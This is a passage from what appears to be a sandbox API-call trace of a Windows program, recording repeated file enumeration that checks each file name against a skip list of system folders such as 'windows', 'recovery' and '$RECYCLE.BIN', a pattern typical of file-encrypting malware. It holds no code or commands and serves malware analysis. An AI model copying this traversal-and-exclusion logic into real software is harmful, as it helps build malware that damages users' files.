lpUsedDefaultChar=0x0) returned 47 [0126.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0126.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dee0 [0126.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245200 | out: hHeap=0x1e0000) returned 1 [0126.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.371] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41a796b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf41f3e26, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1e038, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.371] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0126.371] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0126.371] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0126.372] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0126.372] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0126.372] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0126.372] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0126.372] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.372] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0126.372] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0126.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dba8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0126.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d920, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0126.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ecb8 [0126.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0126.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.372] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2fa0ca2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2fa0ca2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2fa0ca2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MIE9BA~1.DLL")) returned 1 [0126.372] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0126.372] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0126.372] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0126.372] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0126.372] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0126.372] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0126.372] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0126.372] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.372] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0126.372] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0126.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0126.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0126.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20d578, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e688 [0126.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0126.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.373] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6dea551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6dea551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6dea551, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c050, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0126.373] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0126.373] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0126.373] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0126.373] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0126.373] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0126.373] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0126.373] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0126.373] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.373] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0126.373] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0126.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0126.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0126.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0126.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0126.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247898 [0126.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0126.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.374] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6c45b55, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6c45b55, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c45b55, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48060, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MIB24E~1.DLL")) returned 1 [0126.374] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0126.374] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0126.374] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0126.374] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0126.374] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0126.374] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0126.374] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0126.374] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.374] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0126.374] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0126.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0126.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dde8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0126.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dba8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dee0 [0126.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0126.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.374] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x238ed8d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x238ed8d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e95d39, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8088, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0126.374] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0126.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0126.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0126.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0126.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dba8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0126.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0126.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.375] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14058, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MI2EA0~1.DLL")) returned 1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0126.375] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0126.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0126.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dba8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0126.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0126.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dde8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0126.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e458 [0126.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.376] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf443017d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf443017d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf44563cd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x19ae8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.376] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0126.376] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0126.376] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0126.376] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0126.376] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0126.376] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", 